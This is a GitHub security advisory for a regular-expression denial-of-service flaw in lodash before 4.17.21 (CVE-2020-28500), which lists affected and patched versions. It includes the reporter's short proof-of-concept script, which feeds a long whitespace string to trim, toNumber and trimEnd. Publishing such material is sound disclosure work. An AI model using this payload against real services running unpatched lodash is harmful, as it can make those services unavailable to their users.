Skip to content

Regular Expression Denial of Service (ReDoS) in lodash

moderate severity GitHub Reviewed Published Jan 6, 2022
We are still processing this advisory. You may have affected repositories that are not yet on this list. Check back soon for more.

Package

npm lodash (npm)

Affected versions

< 4.17.21

Patched versions

4.17.21

Description

All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0: " + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log("time_cost1: " + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log("time_cost2: " + time_cost2)

References

CVE ID

CVE-2020-28500

CVSS Score

5.3 Moderate
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L